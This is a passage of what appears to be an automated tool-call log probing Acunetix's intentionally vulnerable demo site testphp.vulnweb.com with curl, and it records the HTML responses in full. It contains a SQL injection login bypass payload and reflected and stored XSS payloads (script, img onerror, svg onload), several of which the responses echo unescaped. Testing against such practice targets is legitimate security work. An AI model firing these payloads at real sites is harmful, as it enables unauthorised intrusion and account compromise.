color='red'>test</font> and the password <font color='red'>test</font>. \n </h3>\n\t</div>\n</div>\n<!-- InstanceEndEditable -->\n<!--end content -->\n\n<div id=\"navBar\"> \n <div id=\"search\"> \n <form action=\"search.php?test=query\" method=\"post\"> \n <label>search art</label> \n <input name=\"searchFor\" type=\"text\" size=\"10\"> \n <input name=\"goButton\" type=\"submit\" value=\"go\"> \n </form> \n </div> \n <div id=\"sectionLinks\"> \n <ul> \n <li><a href=\"categories.php\">Browse categories</a></li> \n <li><a href=\"artists.php\">Browse artists</a></li> \n <li><a href=\"cart.php\">Your cart</a></li> \n <li><a href=\"login.php\">Signup</a></li>\n\t <li><a href=\"userinfo.php\">Your profile</a></li>\n\t <li><a href=\"guestbook.php\">Our guestbook</a></li>\n\t\t<li><a href=\"AJAX/index.php\">AJAX Demo</a></li>\n\t </li> \n </ul> \n </div> \n <div class=\"relatedLinks\"> \n <h3>Links</h3> \n <ul> \n <li><a href=\"http://www.acunetix.com\">Security art</a></li> \n\t <li><a href=\"https://www.acunetix.com/vulnerability-scanner/php-security-scanner/\">PHP scanner</a></li>\n\t <li><a href=\"https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/\">PHP vuln help</a></li>\n\t <li><a href=\"http://www.eclectasy.com/Fractal-Explorer/index.html\">Fractal Explorer</a></li> \n </ul> \n </div> \n <div id=\"advert\"> \n <p>\n <object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0\" width=\"107\" height=\"66\">\n <param name=\"movie\" value=\"Flash/add.swf\">\n <param name=quality value=high>\n <embed src=\"Flash/add.swf\" quality=high pluginspage=\"http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash\" type=\"application/x-shockwave-flash\" width=\"107\" height=\"66\"></embed>\n </object>\n </p>\n </div> \n</div> \n\n<!--end navbar --> \n<div id=\"siteInfo\"> <a href=\"http://www.acunetix.com\">About Us</a> | <a href=\"privacy.php\">Privacy Policy</a> | <a href=\"mailto:wvs@acunetix.com\">Contact Us</a> | &copy;2019\n Acunetix Ltd \n</div> \n<br> \n<div style=\"background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px\">\n<p style=\"padding-left:5%;padding-right:5%\"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p>\n</div>\n</div>\n</body>\n<!-- InstanceEnd --></html>\n",
"timestamp": "2026-01-09T22:29:43.357401"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/login.php\" -d \"uname=admin%27%23&pass=anything\"",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/login.php\" -d \"uname=admin%27%23&pass=anything\"",
"success": true,
"output": "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\"\n\"http://www.w3.org/TR/html4/loose.dtd\">\n<html><!-- InstanceBegin template=\"/Templates/main_dynamic_template.dwt.php\" codeOutsideHTMLIsLocked=\"false\" -->\n<head>\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-2\">\n\n<!-- InstanceBeginEditable name=\"document_title_rgn\" -->\n<title>login page</title>\n<!-- InstanceEndEditable -->\n<link rel=\"stylesheet\" href=\"style.css\" type=\"text/css\">\n<!-- InstanceBeginEditable name=\"headers_rgn\" -->\n<!-- here goes headers headers -->\n<!-- InstanceEndEditable -->\n<script language=\"JavaScript\" type=\"text/JavaScript\">\n<!--\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\n if (init==true) with (navigator) {if ((appName==\"Netscape\")&&(parseInt(appVersion)==4)) {\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\n}\nMM_reloadPage(true);\n//-->\n</script>\n\n</head>\n<body> \n<div id=\"mainLayer\" style=\"position:absolute; width:700px; z-index:1\">\n<div id=\"masthead\"> \n <h1 id=\"siteName\"><a href=\"https://www.acunetix.com/\"><img src=\"images/logo.gif\" width=\"306\" height=\"38\" border=\"0\" alt=\"Acunetix website security\"></a></h1> \n <h6 id=\"siteInfo\">TEST and Demonstration site for <a href=\"https://www.acunetix.com/vulnerability-scanner/\">Acunetix Web Vulnerability Scanner</a></h6>\n <div id=\"globalNav\"> \n \t<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"><tr>\n\t<td align=\"left\">\n\t\t<a href=\"index.php\">home</a> | <a href=\"categories.php\">categories</a> | <a href=\"artists.php\">artists\n\t\t</a> | <a href=\"disclaimer.php\">disclaimer</a> | <a href=\"cart.php\">your cart</a> | \n\t\t<a href=\"guestbook.php\">guestbook</a> | \n\t\t<a href=\"AJAX/index.php\">AJAX Demo</a>\n\t</td>\n\t<td align=\"right\">\n\t\t</td>\n\t</tr></table>\n </div> \n</div> \n<!-- end masthead --> \n\n<!-- begin content -->\n<!-- InstanceBeginEditable name=\"content_rgn\" -->\n<div id=\"content\">\n\t<div class=\"story\">\n\t<h3>If you are already registered please enter your login information below:</h3><br>\n\t<form name=\"loginform\" method=\"post\" action=\"userinfo.php\">\n\t<table cellpadding=\"4\" cellspacing=\"1\">\n\t\t<tr><td>Username : </td><td><input name=\"uname\" type=\"text\" size=\"20\" style=\"width:120px;\"></td></tr>\n\t\t<tr><td>Password : </td><td><input name=\"pass\" type=\"password\" size=\"20\" style=\"width:120px;\"></td></tr>\n\t\t<tr><td colspan=\"2\" align=\"right\"><input type=\"submit\" value=\"login\" style=\"width:75px;\"></td></tr>\n\t</table>\n\t</form>\n \t</div>\n\t<div class=\"story\">\n\t<h3>\n You can also <a href=\"signup.php\">signup here</a>.<br>\n Signup disabled. Please use the username <font color='red'>test</font> and the password <font color='red'>test</font>. \n </h3>\n\t</div>\n</div>\n<!-- InstanceEndEditable -->\n<!--end content -->\n\n<div id=\"navBar\"> \n <div id=\"search\"> \n <form action=\"search.php?test=query\" method=\"post\"> \n <label>search art</label> \n <input name=\"searchFor\" type=\"text\" size=\"10\"> \n <input name=\"goButton\" type=\"submit\" value=\"go\"> \n </form> \n </div> \n <div id=\"sectionLinks\"> \n <ul> \n <li><a href=\"categories.php\">Browse categories</a></li> \n <li><a href=\"artists.php\">Browse artists</a></li> \n <li><a href=\"cart.php\">Your cart</a></li> \n <li><a href=\"login.php\">Signup</a></li>\n\t <li><a href=\"userinfo.php\">Your profile</a></li>\n\t <li><a href=\"guestbook.php\">Our guestbook</a></li>\n\t\t<li><a href=\"AJAX/index.php\">AJAX Demo</a></li>\n\t </li> \n </ul> \n </div> \n <div class=\"relatedLinks\"> \n <h3>Links</h3> \n <ul> \n <li><a href=\"http://www.acunetix.com\">Security art</a></li> \n\t <li><a href=\"https://www.acunetix.com/vulnerability-scanner/php-security-scanner/\">PHP scanner</a></li>\n\t <li><a href=\"https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/\">PHP vuln help</a></li>\n\t <li><a href=\"http://www.eclectasy.com/Fractal-Explorer/index.html\">Fractal Explorer</a></li> \n </ul> \n </div> \n <div id=\"advert\"> \n <p>\n <object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0\" width=\"107\" height=\"66\">\n <param name=\"movie\" value=\"Flash/add.swf\">\n <param name=quality value=high>\n <embed src=\"Flash/add.swf\" quality=high pluginspage=\"http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash\" type=\"application/x-shockwave-flash\" width=\"107\" height=\"66\"></embed>\n </object>\n </p>\n </div> \n</div> \n\n<!--end navbar --> \n<div id=\"siteInfo\"> <a href=\"http://www.acunetix.com\">About Us</a> | <a href=\"privacy.php\">Privacy Policy</a> | <a href=\"mailto:wvs@acunetix.com\">Contact Us</a> | &copy;2019\n Acunetix Ltd \n</div> \n<br> \n<div style=\"background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px\">\n<p style=\"padding-left:5%;padding-right:5%\"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p>\n</div>\n</div>\n</body>\n<!-- InstanceEnd --></html>\n",
"timestamp": "2026-01-09T22:29:43.804458"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/search.php?test=%3Cscript%3Ealert%281%29%3C/script%3E\"",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/search.php?test=%3Cscript%3Ealert%281%29%3C/script%3E\"",
"success": true,
"output": "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\"\n\"http://www.w3.org/TR/html4/loose.dtd\">\n<html><!-- InstanceBegin template=\"/Templates/main_dynamic_template.dwt.php\" codeOutsideHTMLIsLocked=\"false\" -->\n<head>\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-2\">\n\n<!-- InstanceBeginEditable name=\"document_title_rgn\" -->\n<title>search</title>\n<!-- InstanceEndEditable -->\n<link rel=\"stylesheet\" href=\"style.css\" type=\"text/css\">\n<!-- InstanceBeginEditable name=\"headers_rgn\" -->\n<!-- here goes headers headers -->\n<!-- InstanceEndEditable -->\n<script language=\"JavaScript\" type=\"text/JavaScript\">\n<!--\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\n if (init==true) with (navigator) {if ((appName==\"Netscape\")&&(parseInt(appVersion)==4)) {\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\n}\nMM_reloadPage(true);\n//-->\n</script>\n\n</head>\n<body> \n<div id=\"mainLayer\" style=\"position:absolute; width:700px; z-index:1\">\n<div id=\"masthead\"> \n <h1 id=\"siteName\"><a href=\"https://www.acunetix.com/\"><img src=\"images/logo.gif\" width=\"306\" height=\"38\" border=\"0\" alt=\"Acunetix website security\"></a></h1> \n <h6 id=\"siteInfo\">TEST and Demonstration site for <a href=\"https://www.acunetix.com/vulnerability-scanner/\">Acunetix Web Vulnerability Scanner</a></h6>\n <div id=\"globalNav\"> \n \t<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"><tr>\n\t<td align=\"left\">\n\t\t<a href=\"index.php\">home</a> | <a href=\"categories.php\">categories</a> | <a href=\"artists.php\">artists\n\t\t</a> | <a href=\"disclaimer.php\">disclaimer</a> | <a href=\"cart.php\">your cart</a> | \n\t\t<a href=\"guestbook.php\">guestbook</a> | \n\t\t<a href=\"AJAX/index.php\">AJAX Demo</a>\n\t</td>\n\t<td align=\"right\">\n\t\t</td>\n\t</tr></table>\n </div> \n</div> \n<!-- end masthead --> \n\n<!-- begin content -->\n<!-- InstanceBeginEditable name=\"content_rgn\" -->\n<div id=\"content\">\n\t</div>\n<!-- InstanceEndEditable -->\n<!--end content -->\n\n<div id=\"navBar\"> \n <div id=\"search\"> \n <form action=\"search.php?test=query\" method=\"post\"> \n <label>search art</label> \n <input name=\"searchFor\" type=\"text\" size=\"10\"> \n <input name=\"goButton\" type=\"submit\" value=\"go\"> \n </form> \n </div> \n <div id=\"sectionLinks\"> \n <ul> \n <li><a href=\"categories.php\">Browse categories</a></li> \n <li><a href=\"artists.php\">Browse artists</a></li> \n <li><a href=\"cart.php\">Your cart</a></li> \n <li><a href=\"login.php\">Signup</a></li>\n\t <li><a href=\"userinfo.php\">Your profile</a></li>\n\t <li><a href=\"guestbook.php\">Our guestbook</a></li>\n\t\t<li><a href=\"AJAX/index.php\">AJAX Demo</a></li>\n\t </li> \n </ul> \n </div> \n <div class=\"relatedLinks\"> \n <h3>Links</h3> \n <ul> \n <li><a href=\"http://www.acunetix.com\">Security art</a></li> \n\t <li><a href=\"https://www.acunetix.com/vulnerability-scanner/php-security-scanner/\">PHP scanner</a></li>\n\t <li><a href=\"https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/\">PHP vuln help</a></li>\n\t <li><a href=\"http://www.eclectasy.com/Fractal-Explorer/index.html\">Fractal Explorer</a></li> \n </ul> \n </div> \n <div id=\"advert\"> \n <p>\n <object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0\" width=\"107\" height=\"66\">\n <param name=\"movie\" value=\"Flash/add.swf\">\n <param name=quality value=high>\n <embed src=\"Flash/add.swf\" quality=high pluginspage=\"http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash\" type=\"application/x-shockwave-flash\" width=\"107\" height=\"66\"></embed>\n </object>\n </p>\n </div> \n</div> \n\n<!--end navbar --> \n<div id=\"siteInfo\"> <a href=\"http://www.acunetix.com\">About Us</a> | <a href=\"privacy.php\">Privacy Policy</a> | <a href=\"mailto:wvs@acunetix.com\">Contact Us</a> | &copy;2019\n Acunetix Ltd \n</div> \n<br> \n<div style=\"background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px\">\n<p style=\"padding-left:5%;padding-right:5%\"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p>\n</div>\n</div>\n</body>\n<!-- InstanceEnd --></html>\n",
"timestamp": "2026-01-09T22:29:44.239692"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/search.php\" -d \"searchFor=%3Cimg%20src=x%20onerror=alert%281%29%3E&goButton=go\"",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/search.php\" -d \"searchFor=%3Cimg%20src=x%20onerror=alert%281%29%3E&goButton=go\"",
"success": true,
"output": "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\"\n\"http://www.w3.org/TR/html4/loose.dtd\">\n<html><!-- InstanceBegin template=\"/Templates/main_dynamic_template.dwt.php\" codeOutsideHTMLIsLocked=\"false\" -->\n<head>\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-2\">\n\n<!-- InstanceBeginEditable name=\"document_title_rgn\" -->\n<title>search</title>\n<!-- InstanceEndEditable -->\n<link rel=\"stylesheet\" href=\"style.css\" type=\"text/css\">\n<!-- InstanceBeginEditable name=\"headers_rgn\" -->\n<!-- here goes headers headers -->\n<!-- InstanceEndEditable -->\n<script language=\"JavaScript\" type=\"text/JavaScript\">\n<!--\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\n if (init==true) with (navigator) {if ((appName==\"Netscape\")&&(parseInt(appVersion)==4)) {\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\n}\nMM_reloadPage(true);\n//-->\n</script>\n\n</head>\n<body> \n<div id=\"mainLayer\" style=\"position:absolute; width:700px; z-index:1\">\n<div id=\"masthead\"> \n <h1 id=\"siteName\"><a href=\"https://www.acunetix.com/\"><img src=\"images/logo.gif\" width=\"306\" height=\"38\" border=\"0\" alt=\"Acunetix website security\"></a></h1> \n <h6 id=\"siteInfo\">TEST and Demonstration site for <a href=\"https://www.acunetix.com/vulnerability-scanner/\">Acunetix Web Vulnerability Scanner</a></h6>\n <div id=\"globalNav\"> \n \t<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"><tr>\n\t<td align=\"left\">\n\t\t<a href=\"index.php\">home</a> | <a href=\"categories.php\">categories</a> | <a href=\"artists.php\">artists\n\t\t</a> | <a href=\"disclaimer.php\">disclaimer</a> | <a href=\"cart.php\">your cart</a> | \n\t\t<a href=\"guestbook.php\">guestbook</a> | \n\t\t<a href=\"AJAX/index.php\">AJAX Demo</a>\n\t</td>\n\t<td align=\"right\">\n\t\t</td>\n\t</tr></table>\n </div> \n</div> \n<!-- end masthead --> \n\n<!-- begin content -->\n<!-- InstanceBeginEditable name=\"content_rgn\" -->\n<div id=\"content\">\n\t<h2 id='pageName'>searched for: <img src=x onerror=alert(1)></h2></div>\n<!-- InstanceEndEditable -->\n<!--end content -->\n\n<div id=\"navBar\"> \n <div id=\"search\"> \n <form action=\"search.php?test=query\" method=\"post\"> \n <label>search art</label> \n <input name=\"searchFor\" type=\"text\" size=\"10\"> \n <input name=\"goButton\" type=\"submit\" value=\"go\"> \n </form> \n </div> \n <div id=\"sectionLinks\"> \n <ul> \n <li><a href=\"categories.php\">Browse categories</a></li> \n <li><a href=\"artists.php\">Browse artists</a></li> \n <li><a href=\"cart.php\">Your cart</a></li> \n <li><a href=\"login.php\">Signup</a></li>\n\t <li><a href=\"userinfo.php\">Your profile</a></li>\n\t <li><a href=\"guestbook.php\">Our guestbook</a></li>\n\t\t<li><a href=\"AJAX/index.php\">AJAX Demo</a></li>\n\t </li> \n </ul> \n </div> \n <div class=\"relatedLinks\"> \n <h3>Links</h3> \n <ul> \n <li><a href=\"http://www.acunetix.com\">Security art</a></li> \n\t <li><a href=\"https://www.acunetix.com/vulnerability-scanner/php-security-scanner/\">PHP scanner</a></li>\n\t <li><a href=\"https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/\">PHP vuln help</a></li>\n\t <li><a href=\"http://www.eclectasy.com/Fractal-Explorer/index.html\">Fractal Explorer</a></li> \n </ul> \n </div> \n <div id=\"advert\"> \n <p>\n <object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0\" width=\"107\" height=\"66\">\n <param name=\"movie\" value=\"Flash/add.swf\">\n <param name=quality value=high>\n <embed src=\"Flash/add.swf\" quality=high pluginspage=\"http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash\" type=\"application/x-shockwave-flash\" width=\"107\" height=\"66\"></embed>\n </object>\n </p>\n </div> \n</div> \n\n<!--end navbar --> \n<div id=\"siteInfo\"> <a href=\"http://www.acunetix.com\">About Us</a> | <a href=\"privacy.php\">Privacy Policy</a> | <a href=\"mailto:wvs@acunetix.com\">Contact Us</a> | &copy;2019\n Acunetix Ltd \n</div> \n<br> \n<div style=\"background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px\">\n<p style=\"padding-left:5%;padding-right:5%\"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p>\n</div>\n</div>\n</body>\n<!-- InstanceEnd --></html>\n",
"timestamp": "2026-01-09T22:29:44.685384"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/search.php\" -d \"searchFor=%3Csvg%20onload=alert%281%29%3E&goButton=go\"",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/search.php\" -d \"searchFor=%3Csvg%20onload=alert%281%29%3E&goButton=go\"",
"success": true,
"output": "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\"\n\"http://www.w3.org/TR/html4/loose.dtd\">\n<html><!-- InstanceBegin template=\"/Templates/main_dynamic_template.dwt.php\" codeOutsideHTMLIsLocked=\"false\" -->\n<head>\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-2\">\n\n<!-- InstanceBeginEditable name=\"document_title_rgn\" -->\n<title>search</title>\n<!-- InstanceEndEditable -->\n<link rel=\"stylesheet\" href=\"style.css\" type=\"text/css\">\n<!-- InstanceBeginEditable name=\"headers_rgn\" -->\n<!-- here goes headers headers -->\n<!-- InstanceEndEditable -->\n<script language=\"JavaScript\" type=\"text/JavaScript\">\n<!--\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\n if (init==true) with (navigator) {if ((appName==\"Netscape\")&&(parseInt(appVersion)==4)) {\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\n}\nMM_reloadPage(true);\n//-->\n</script>\n\n</head>\n<body> \n<div id=\"mainLayer\" style=\"position:absolute; width:700px; z-index:1\">\n<div id=\"masthead\"> \n <h1 id=\"siteName\"><a href=\"https://www.acunetix.com/\"><img src=\"images/logo.gif\" width=\"306\" height=\"38\" border=\"0\" alt=\"Acunetix website security\"></a></h1> \n <h6 id=\"siteInfo\">TEST and Demonstration site for <a href=\"https://www.acunetix.com/vulnerability-scanner/\">Acunetix Web Vulnerability Scanner</a></h6>\n <div id=\"globalNav\"> \n \t<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"><tr>\n\t<td align=\"left\">\n\t\t<a href=\"index.php\">home</a> | <a href=\"categories.php\">categories</a> | <a href=\"artists.php\">artists\n\t\t</a> | <a href=\"disclaimer.php\">disclaimer</a> | <a href=\"cart.php\">your cart</a> | \n\t\t<a href=\"guestbook.php\">guestbook</a> | \n\t\t<a href=\"AJAX/index.php\">AJAX Demo</a>\n\t</td>\n\t<td align=\"right\">\n\t\t</td>\n\t</tr></table>\n </div> \n</div> \n<!-- end masthead --> \n\n<!-- begin content -->\n<!-- InstanceBeginEditable name=\"content_rgn\" -->\n<div id=\"content\">\n\t<h2 id='pageName'>searched for: <svg onload=alert(1)></h2></div>\n<!-- InstanceEndEditable -->\n<!--end content -->\n\n<div id=\"navBar\"> \n <div id=\"search\"> \n <form action=\"search.php?test=query\" method=\"post\"> \n <label>search art</label> \n <input name=\"searchFor\" type=\"text\" size=\"10\"> \n <input name=\"goButton\" type=\"submit\" value=\"go\"> \n </form> \n </div> \n <div id=\"sectionLinks\"> \n <ul> \n <li><a href=\"categories.php\">Browse categories</a></li> \n <li><a href=\"artists.php\">Browse artists</a></li> \n <li><a href=\"cart.php\">Your cart</a></li> \n <li><a href=\"login.php\">Signup</a></li>\n\t <li><a href=\"userinfo.php\">Your profile</a></li>\n\t <li><a href=\"guestbook.php\">Our guestbook</a></li>\n\t\t<li><a href=\"AJAX/index.php\">AJAX Demo</a></li>\n\t </li> \n </ul> \n </div> \n <div class=\"relatedLinks\"> \n <h3>Links</h3> \n <ul> \n <li><a href=\"http://www.acunetix.com\">Security art</a></li> \n\t <li><a href=\"https://www.acunetix.com/vulnerability-scanner/php-security-scanner/\">PHP scanner</a></li>\n\t <li><a href=\"https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/\">PHP vuln help</a></li>\n\t <li><a href=\"http://www.eclectasy.com/Fractal-Explorer/index.html\">Fractal Explorer</a></li> \n </ul> \n </div> \n <div id=\"advert\"> \n <p>\n <object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0\" width=\"107\" height=\"66\">\n <param name=\"movie\" value=\"Flash/add.swf\">\n <param name=quality value=high>\n <embed src=\"Flash/add.swf\" quality=high pluginspage=\"http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash\" type=\"application/x-shockwave-flash\" width=\"107\" height=\"66\"></embed>\n </object>\n </p>\n </div> \n</div> \n\n<!--end navbar --> \n<div id=\"siteInfo\"> <a href=\"http://www.acunetix.com\">About Us</a> | <a href=\"privacy.php\">Privacy Policy</a> | <a href=\"mailto:wvs@acunetix.com\">Contact Us</a> | &copy;2019\n Acunetix Ltd \n</div> \n<br> \n<div style=\"background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px\">\n<p style=\"padding-left:5%;padding-right:5%\"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p>\n</div>\n</div>\n</body>\n<!-- InstanceEnd --></html>\n",
"timestamp": "2026-01-09T22:29:45.126505"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/guestbook.php\" -d \"name=%3Cscript%3Ealert%281%29%3C/script%3E&comment=test\"",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/guestbook.php\" -d \"name=%3Cscript%3Ealert%281%29%3C/script%3E&comment=test\"",
"success": true,
"output": "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\"\n\"http://www.w3.org/TR/html4/loose.dtd\">\n<html><!-- InstanceBegin template=\"/Templates/main_dynamic_template.dwt.php\" codeOutsideHTMLIsLocked=\"false\" -->\n<head>\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-2\">\n\n<!-- InstanceBeginEditable name=\"document_title_rgn\" -->\n<title>guestbook</title>\n<!-- InstanceEndEditable -->\n<link rel=\"stylesheet\" href=\"style.css\" type=\"text/css\">\n<!-- InstanceBeginEditable name=\"headers_rgn\" -->\n<!-- InstanceEndEditable -->\n<script language=\"JavaScript\" type=\"text/JavaScript\">\n<!--\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\n if (init==true) with (navigator) {if ((appName==\"Netscape\")&&(parseInt(appVersion)==4)) {\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\n}\nMM_reloadPage(true);\n//-->\n</script>\n\n</head>\n<body> \n<div id=\"mainLayer\" style=\"position:absolute; width:700px; z-index:1\">\n<div id=\"masthead\"> \n <h1 id=\"siteName\"><a href=\"https://www.acunetix.com/\"><img src=\"images/logo.gif\" width=\"306\" height=\"38\" border=\"0\" alt=\"Acunetix website security\"></a></h1> \n <h6 id=\"siteInfo\">TEST and Demonstration site for <a href=\"https://www.acunetix.com/vulnerability-scanner/\">Acunetix Web Vulnerability Scanner</a></h6>\n <div id=\"globalNav\"> \n \t<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"><tr>\n\t<td align=\"left\">\n\t\t<a href=\"index.php\">home</a> | <a href=\"categories.php\">categories</a> | <a href=\"artists.php\">artists\n\t\t</a> | <a href=\"disclaimer.php\">disclaimer</a> | <a href=\"cart.php\">your cart</a> | \n\t\t<a href=\"guestbook.php\">guestbook</a> | \n\t\t<a href=\"AJAX/index.php\">AJAX Demo</a>\n\t</td>\n\t<td align=\"right\">\n\t\t</td>\n\t</tr></table>\n </div> \n</div> \n<!-- end masthead --> \n\n<!-- begin content -->\n<!-- InstanceBeginEditable name=\"content_rgn\" -->\n<div id=\"content\">\n\t<div class=\"story\">\n\t<table width=\"100%\" cellpadding=\"4\" cellspacing=\"1\"><tr><td colspan=\"2\"><h2>Our guestbook</h2></td></tr><tr><td align=\"left\" valign=\"middle\" style=\"background-color:#F5F5F5\"><strong><script>alert(1)</script></strong></td><td align=\"right\" style=\"background-color:#F5F5F5\">01.10.2026, 1:29 am</td></tr><tr><td colspan=\"2\"><img src=\"/images/remark.gif\">&nbsp;&nbsp;</td></tr></table>\t </div>\n\t <div class=\"story\">\n\t \t<form action=\"\" method=\"post\" name=\"faddentry\">\n\t\t\t<input type=\"hidden\" name=\"name\" value=\"anonymous user\">\n\t\t\t<textarea name=\"text\" rows=\"5\" wrap=\"VIRTUAL\" style=\"width:500px;\"></textarea>\n\t\t\t<br>\n\t\t\t<input type=\"submit\" name=\"submit\" value=\"add message\">\n\t\t</form>\n\t </div>\n</div>\n<!-- InstanceEndEditable -->\n<!--end content -->\n\n<div id=\"navBar\"> \n <div id=\"search\"> \n <form action=\"search.php?test=query\" method=\"post\"> \n <label>search art</label> \n <input name=\"searchFor\" type=\"text\" size=\"10\"> \n <input name=\"goButton\" type=\"submit\" value=\"go\"> \n </form> \n </div> \n <div id=\"sectionLinks\"> \n <ul> \n <li><a href=\"categories.php\">Browse categories</a></li> \n <li><a href=\"artists.php\">Browse artists</a></li> \n <li><a href=\"cart.php\">Your cart</a></li> \n <li><a href=\"login.php\">Signup</a></li>\n\t <li><a href=\"userinfo.php\">Your profile</a></li>\n\t <li><a href=\"guestbook.php\">Our guestbook</a></li>\n\t\t<li><a href=\"AJAX/index.php\">AJAX Demo</a></li>\n\t </li> \n </ul> \n </div> \n <div class=\"relatedLinks\"> \n <h3>Links</h3> \n <ul> \n <li><a href=\"http://www.acunetix.com\">Security art</a></li> \n\t <li><a href=\"https://www.acunetix.com/vulnerability-scanner/php-security-scanner/\">PHP scanner</a></li>\n\t <li><a href=\"https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/\">PHP vuln help</a></li>\n\t <li><a href=\"http://www.eclectasy.com/Fractal-Explorer/index.html\">Fractal Explorer</a></li> \n </ul> \n </div> \n <div id=\"advert\"> \n <p>\n <object 